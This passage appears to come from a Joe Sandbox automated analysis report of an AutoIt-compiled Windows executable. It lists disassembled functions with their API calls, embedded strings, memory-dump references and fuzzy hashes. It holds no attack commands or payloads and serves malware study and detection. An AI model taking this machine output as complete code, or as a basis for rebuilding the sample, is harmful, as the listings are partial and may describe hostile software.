                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                        • DeleteObject.GDI32(?), ref: 00477479
                                                                                        • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                                                                        • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                        • Opcode Fuzzy Hash: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                                                                        • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                        Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                          • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                          • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 537147316-1018226102
                                                                                        • Opcode ID: 5c201ddf0927ff72d37508c892e751e9a0ba5ba3f4f6cc93e336cb20751a0e63
                                                                                        • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                        • Opcode Fuzzy Hash: 5c201ddf0927ff72d37508c892e751e9a0ba5ba3f4f6cc93e336cb20751a0e63
                                                                                        • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                        Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462D50
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                        • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                        • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                        • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                        • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                        • GetCursorPos.USER32(?), ref: 00462F56
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                        • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                        • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                        • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                        • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                        Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                        • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                        • CoUninitialize.OLE32 ref: 0047890E
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                        • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                        • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID: ,,I
                                                                                        • API String ID: 2395222682-4163367948
                                                                                        • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                        • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                        • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                        • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                        Function 004577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _memset.LIBCMT ref: 0045786B
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1411258926-22481851
                                                                                        • Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                                                                        • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                                                                                        • Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                                                                        • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                                                                                        Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                        • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                        • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                        • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                        Function 0045F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                                                                                        • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • _wprintf.LIBCMT ref: 0045F7FC
                                                                                        • __swprintf.LIBCMT ref: 0045F81E
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1506413516-4153970271
                                                                                        • Opcode ID: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
                                                                                        • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                                                                                        • Opcode Fuzzy Hash: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
                                                                                        • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                                                                                        Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                          • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                        • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                        • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                        • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                        Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                        • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                        • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                        • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                        Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00464F7A
                                                                                          • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A8B400,00410E7B), ref: 004204A3
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                        • SetActiveWindow.USER32 ref: 0046500B
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                        • IsWindow.USER32 ref: 0046504F
                                                                                        • EndDialog.USER32(00000000), ref: 00465060
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                        • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                        • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                        • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                                        Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                                        • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                                        • _memset.LIBCMT ref: 0046D7E1
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                                        • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                                                                        • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                                        • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                                                                        Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
